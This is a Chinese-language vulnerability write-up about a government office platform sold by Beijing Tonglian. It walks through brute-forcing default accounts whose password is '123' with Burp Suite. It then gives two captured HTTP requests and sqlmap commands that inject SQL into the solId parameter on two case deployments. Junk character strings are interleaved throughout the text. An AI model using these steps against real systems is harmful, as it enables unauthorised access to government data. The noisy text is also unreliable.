|
" |8 ~) S4 G2 Y+ \% t' L& J
. Y1 ]2 n/ N: c, z i 4 w: d Q0 T+ G5 l+ u" u% \
: Q! G) ]. K! j. C 平台简介:
. z# i8 N1 E$ d" Y' G U4 ]9 Z3 ?5 f B 5 [* A% |) ^% T: K$ i7 y
# I+ _+ I* ]3 M+ e. T " b. y9 D# Y+ C9 Z8 Z
1 ]8 ^% e( Y9 Y a2 v' W
& M* V9 X& D& c9 H
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。 " x1 M1 `4 [, b/ T, t' B
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
Q$ `& e/ a4 Z同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!& D- a+ n; j6 y+ G4 V* V
, N* y# d; b& [7 K- |% O
3 Q5 m. Y5 l2 P5 w. W9 S
( r: j3 T+ s9 ^. S
+ d1 ~8 x/ V" [0 l) {$ O" U y6 ]$ C f/ {4 M# J5 Z: A
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
" p J, l7 v* I7 M/ s) h9 p ! a* ?2 B2 K& N, x3 k
\; l) h' `+ X' P
' }. K& T1 o( K" W: S
& A* l# [# e/ i( C; l- w9 C* P- P' b" s
http://1.1.1.1:7197/cap-aco/#(案例2-)
0 ~; i5 L3 f0 z; I% m ! ?0 k* ~' ]' P3 J
7 l7 t; `3 a t* ]' x http://www.XXOO.com (案例1-官网网站)
9 P O) b. M% V3 X' a+ p $ T% r% i6 m7 Y$ g; X( |+ m
; p5 `: ]! R! j% x* C
9 g" ~; b0 `. z }( Z4 _0 c) H U
' L7 z, ^* [/ n
+ C; T z1 o0 u% E/ E 漏洞详情:
! L5 S& b# G- g/ a% W6 X
, h9 T' s7 b: w7 D+ n+ K9 H' r d# j
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试8 [' h# B& u# b1 Q7 M7 P
4 n o; K- {$ P( ^) _# v( l- a: |! R1 U9 ]% J5 Y4 L& x6 A
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
) l8 D1 s( G! v! J$ w ^. }5 }& b & B! |- N6 l; U7 I
+ r2 t1 A" Q/ j# u! ?
/ S6 U3 h) ]- e0 S" q / C b6 J7 s4 a( ]
: z+ }' m- P/ o* d& F1 U" D
: e" f9 e {# w
1 b3 L1 z- K: C; Z3 L5 d7 n n% M4 B2 M2 `- i
status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:# }; M% ~ H: i. |
0 H2 T3 l c) W9 k S
& q9 k7 @8 O7 u0 J
1、案例1-官方网站
- S2 s0 I$ y6 B* d7 N8 v! B& C) |' H! W
+ p$ R9 a* R: F* e7 E
+ E: A8 z7 q s GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1% c! n' i: A; A' J9 U
, W; G6 I( t4 {; W+ F
" @" b3 \. s! g: y( v/ \ Host: www.XXOO.com
: H0 E* Y+ `! V; E( y2 b' w
`/ G" C% m1 C7 `4 y+ f& D6 N# o( _6 x8 i
Proxy-Connection: Keep-Alive
. r5 f' k8 e" J 1 M2 ^1 ~2 P; m4 f2 b0 \- V# g
1 l, |3 N7 q- W1 [ Accept: application/json, text/javascript, */*; q=0.01
# f$ N$ L( G& E* {, g , ^2 {# [; I4 M2 T/ M
+ R; u! b4 c# K" y2 `3 S
Accept-Language: zh-CN. G5 v' L0 j1 W0 P9 V9 v
0 c) Z9 y$ z' a0 \$ s, L+ F: ]
: u; q* I0 a. W! W7 A. O: G! F Content-Type: application/json
9 O* s9 J2 u7 k Y5 Q! i
5 W8 D" X2 E* A5 L2 [$ Z6 d, t9 i: `& X4 K+ V4 q% _) Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko
- o% P5 Y! k- t3 D+ G: G0 G
; \1 w2 S& \- F" `. C( U. h1 a5 F3 | d$ m
X-Requested-With: XMLHttpRequest# Q+ P3 D: \) ~& x x$ v" E
8 }5 y$ b+ R5 t& I
1 b% h! O4 t1 z. z Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002" C$ c- Q$ R+ ~
5 L3 X3 e+ Y" R7 y" T8 D$ i! Y: c. M8 x# Z' {4 b7 k) H C
Accept-Encoding: gzip, deflate, sdch
}3 g9 i4 c4 v! m" _) M
) W0 q: k+ n9 k: X* X, Y1 \6 k6 e; W( y
Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
, b' A% E" i$ d* n1 z. _0 x* l
# I0 g* g4 A8 h3 E# ?5 Q
* ^( f6 [0 H9 j+ I u( T2 O 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:: _9 c; n4 E8 C0 ?
5 u3 c# v8 w2 `- S: [% n: u7 l) X0 C3 ]4 d1 G9 g/ O
8 i: G/ j! S! H" Q: \+ ]9 O * t$ Q' v# J2 a
. Y) ^$ r& q* r, x6 Q
1 Z9 e- g( G, ? ! z8 x6 w$ m( r5 s" `
0 f7 k# ?$ }" Z: }
3 p! d! y2 \# p $ T# j5 [7 |' a7 D
; V, F1 s0 s" P% ^0 L' d 3 f- o: x% e" i W+ u! R, H1 C
5 Y+ L' L- ^) \$ Y" v- ]0 b. T
# I7 ] Q: S3 g' U4 c$ O
9 @6 c* D; T' q# W8 V
0 u( ^! @$ ?+ X8 |. _. T9 Q5 D# W# ]# U) P) U1 L( a
2、案例2-某天河云平台
5 Y" ?, ?& R) D3 z# b ; o2 Z, f) k* M5 n
: B$ z5 L7 m1 O; A5 j: d1 |/ F GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
+ ?2 q1 N5 s. l) u4 |4 Z" M
0 R# P9 b7 E; P
+ \: k' u# ]! r2 E6 w Host: 1.1.1.:7197" y9 Z' {! n4 Q( {6 \
8 z6 i/ [5 U6 J& `: @" W; E
/ b: \0 Y& A/ K/ D Accept: application/json, text/javascript, */*; q=0.01
6 Z" E3 O1 z% R* k( X5 Y
% S1 a P6 y6 e
* `) Z! r, R6 Y8 E3 f X-Requested-With: XMLHttpRequest
4 u! j/ [9 W5 ^1 G1 [# \8 \; r" C: S
) u2 c/ X- y6 G. O7 r. s9 H" H$ T2 o( f; s m; C4 N
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0- Q$ p% [8 W7 ^
$ ~* S/ l6 D1 F
" u3 W- Z" u H9 k' q- N5 t
Content-Type: application/json+ c% n" T& Z: I0 a. R
5 h( b- x" x; ^
$ p! N4 Q$ |% K) _0 j Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=10086 ]5 t5 }/ N1 ^* {' L7 z
D8 X2 U+ O6 s6 r! |# f: ]) A
% J" H, A2 }8 D' g% k2 I6 h. v Accept-Language: zh-CN,zh;q=0.8
" B8 \2 J8 ^, I% n+ F5 K' A9 Z5 F3 \
" h* ?! p8 q9 W& t8 k; f8 J
7 J" x8 ~% Q: C Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1
9 J6 S7 u3 v6 X, v e5 S% g# z
% ^& g4 R9 d/ K5 g3 _& H# Z/ y5 z2 X( W* B0 U
Connection: close
. H4 r% D# }: h/ M9 @# T C ; v+ S. H% t S, ]2 m/ l
8 q3 s- o) d0 Y/ C0 C
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:, x1 S @& F6 ?! n1 L
' h. W% N2 w" p1 Q/ h
/ u$ C! Y' Z& \
6 e* t- @6 Z e / F b% V5 f7 I5 H; m
( _0 t! X+ M6 ?& Z1 Y1 @* q
5 `+ x V7 s& w1 n: j/ R |